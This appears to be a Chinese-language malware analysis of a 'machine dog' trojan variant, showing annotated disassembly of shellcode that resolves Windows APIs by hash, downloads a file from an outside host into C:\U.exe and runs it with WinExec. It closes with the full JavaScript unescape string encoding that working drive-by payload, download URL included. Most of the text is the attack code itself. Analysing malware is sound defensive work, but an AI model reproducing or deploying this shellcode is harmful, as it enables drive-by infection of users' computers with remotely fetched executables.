1、shellcode初始化代码
代码:
00401000 > $ 8D85 70FEFFFF lea eax, dword ptr [ebp-190] ; shellcode初始化代码 00401006 . 50 push eax ; /pWSAData 00401007 . 68 01010000 push 101 ; |RequestedVersion = 101 (1.1.) 0040100C . FF15 18504000 call dword ptr [<&Ws2_32.WSAStartup>] ; \WSAStartup
代码:
00401020 . EB 54 jmp short 00401076 ------------------- 00401022 /$ 8B75 3C mov esi, dword ptr [ebp+3C] | 00401025 |. 8B7435 78 mov esi, dword ptr [ebp+esi+78] | 00401029 |. 03F5 add esi, ebp | 0040102B |. 56 push esi | 0040102C |. 8B76 20 mov esi, dword ptr [esi+20] 0040102F |. 03F5 add esi, ebp 00401031 |. 33C9 xor ecx, ecx 00401033 |. 49 dec ecx 00401034 |> 41 /inc ecx 00401035 |. AD |lods dword ptr [esi] 这部分就是获取函数的运算部分 00401036 |. 33DB |xor ebx, ebx 00401038 |> 36:0FBE1428 |/movsx edx, byte ptr ss:[eax+ebp] 0040103D |. 38F2 ||cmp dl, dh 0040103F |. 74 08 ||je short 00401049 00401041 |. C1CB 0D ||ror ebx, 0D 00401044 |. 03DA ||add ebx, edx | 00401046 |. 40 ||inc eax | 00401047 |.^ EB EF |\jmp short 00401038 | 00401049 |> 3BDF |cmp ebx, edi | 0040104B |.^ 75 E7 \jnz short 00401034 ----------------------------
下来的为机器狗的最新变种,美其名曰“牛”。
代码:
00401090 . 8B40 3C mov eax, dword ptr [eax+3C] 00401093 > 95 xchg eax, ebp ; 交换 00401094 . BF 8E4E0EEC mov edi, EC0E4E8E ; EDI初始化 00401099 . E8 84FFFFFF call 00401022 ; 获取到kernel32.LoadLibraryA 0040109E . 83EC 04 sub esp, 4 004010A1 . 832C24 3C sub dword ptr [esp], 3C 004010A5 . FFD0 call eax ; 执行加载urlmon.dll 004010A7 . 95 xchg eax, ebp 004010A8 . 50 push eax 004010A9 . BF 361A2F70 mov edi, 702F1A36 004010AE . E8 6FFFFFFF call 00401022 ; urlmon.URLDownloadToFileA 004010B3 . 8B5424 FC mov edx, dword ptr [esp-4] 004010B7 . 8D52 BA lea edx, dword ptr [edx-46] ; 执行后保存到本地的文件路径和名称 C:\U.exe 004010BA . 33DB xor ebx, ebx 004010BC . 53 push ebx 004010BD . 53 push ebx 004010BE . 52 push edx ; C:\U.exe 压栈 004010BF . EB 24 jmp short 004010E5 004010C1 $ 53 push ebx 004010C2 . FFD0 call eax ; hxxp://qq.18i16.net/exe1/lzz.css执行下载 004010C4 . 5D pop ebp 004010C5 . BF 98FE8A0E mov edi, 0E8AFE98 ; edi初始化 004010CA . E8 53FFFFFF call 00401022 ; 获取到函数kernel32.WinExec 004010CF . 83EC 04 sub esp, 4 004010D2 . 832C24 62 sub dword ptr [esp], 62 004010D6 . FFD0 call eax ; 执行 004010D8 . BF 7ED8E273 mov edi, 73E2D87E 004010DD . E8 40FFFFFF call 00401022 ; 获取到函数kernel32.ExitProcess 004010E2 . 52 push edx 004010E3 . FFD0 call eax ; shellcode执行完毕退出 004010E5 > E8 D7FFFFFF call 004010C1 ; 获取到函数地址后开始执行动作
代码:
var huoqiang=window["unescape"](""+"%u54EB"+"%u758B"+"%u8B3C"+"%u3574"+"%u0378"+"%u56F5"+"%u768B"+"%u0320"+"%
u33F5"+"%u49C9"+"%uAD41"+"%uDB33"+"%u0F36"+"%u14BE"+"%u3828"+"%u74F2"+"%uC108"+"%u0DCB"+"%uDA03"+"%uEB40"+"%
u3BEF"+"%u75DF"+"%u5EE7"+"%u5E8B"+"%u0324"+"%u66DD"+"%u0C8B"+"%u8B4B"+"%u1C5E"+"%uDD03"+"%u048B"+"%u038B"+"%
uC3C5"+"%u7275"+"%u6D6C"+"%u6E6F"+"%u642E"+"%u6C6C"+"%u4300"+"%u5C3A"+"%u2e55"+"%u7865"+"%u0065%uC033"+"%u0364"+"%
u3040"+"%u0C78"+"%u408"+"B"+"%u8B0"+"C"+"%u"+"1C7"+"0%u8BA"+"D"+"%u084"+"0"+"%u09E"+"B%u408"+"B"+"%
u8D3"+"4%"+"u7C4"+"0"+"%u408"+"B"+"%u953C"+"%u8EBF"+"%u0E4E"+"%uE8EC"+"%uFF84%uFFFF"+"%uEC83"+"%u8304"+"%u242C"+"%
uFF3C"+"%u95D0"+"%uBF50"+"%u1A36"+"%u702F"+"%u6FE8"+"%uFFFF"+"%u8BFF"+"%u2454"+"%u8DFC"+"%uBA52"+"%uDB33"+"%
u5353"+"%uEB52"+"%u5324"+"%uD0FF"+"%uBF5D"+"%uFE98"+"%u0E8A"+"%u53E8"+"%uFFFF"+"%u83FF"+"%u04EC"+"%u2C83"+"%
u6224"+"%uD0FF"+"%u7EBF"+"%uE2D8"+"%uE873"+"%uFF40"+"%uFFFF"+"%uFF52"+"%uE8D0"+"%uFFD7"+"%uFFFF"+"%u74"+"6"+"8%
u7074%u2f3a%u712f%u2e71%u3831%u3169%u2e36%u656e%u2f74%u7865"+"%u3165%u6c2f%u7a7a%u632e%u7373%u0000");